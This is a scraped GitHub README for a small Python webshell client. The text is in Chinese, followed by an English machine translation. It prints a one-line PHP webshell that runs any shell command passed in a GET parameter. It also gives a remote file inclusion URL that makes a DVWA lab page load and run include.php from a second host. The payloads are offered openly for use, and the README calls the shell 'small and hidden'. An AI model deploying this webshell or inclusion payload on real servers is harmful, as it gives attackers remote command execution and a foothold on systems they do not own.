Skip to content
This repository has been archived by the owner on Oct 3, 2021. It is now read-only.

Files

Latest commit

ef08808 · Jan 31, 2021

History

History
86 lines (53 loc) · 1.65 KB

README.md

File metadata and controls

86 lines (53 loc) · 1.65 KB

WebShell v1.0

If you like it, please give me a Star

如果你喜欢它 , 请给我一个Star

不喜自喷

适用于一句话木马等一系列webshell

  • 支持GET请求的一句话木马
  • 小巧隐蔽
  • (编不下去了

木马格式 :

1 . PHP

<? @echo(shell_exec($_GET['CMD']))

2 . 文件包含

http://192.168.1.150/DVWA/vulnerabilities/fi/?page=http://192.168.1.127:8000/http://192.168.1.150/DVWA/vulnerabilities/fi/?page=http://192.168.1.127:8000/include.php
# include.php同上

使用方法:

在终端使用python命令运行

需要安装requests类库

1.png 2.png

缺点 : 没有办法输入交互

In the end,enjoy it!

(2021 1 31 我的第一个github项目

English Document

Machine translation follows

Applicable to a series of webshells such as a Trojan sentence

  • A one-sentence Trojan that supports GET requests

  • Small hidden


Trojan Format :

1 . PHP

<? @echo(shell_exec($_GET['CMD']))

2 . File Inclusion

http://192.168.1.150/DVWA/vulnerabilities/fi/?page=http://192.168.1.127:8000/http://192.168.1.150/DVWA/vulnerabilities/fi/?page=http://192.168.1.127:8000/include.php
# 'include.php' Same as above

Usage:

Run it from the terminal using 'python' commands

** Requires installing the 'Requests' class library **


1.png 2.png

Cons: No way to enter interaction

In the end,enjoy it!

(2021 1 31 My first GitHub project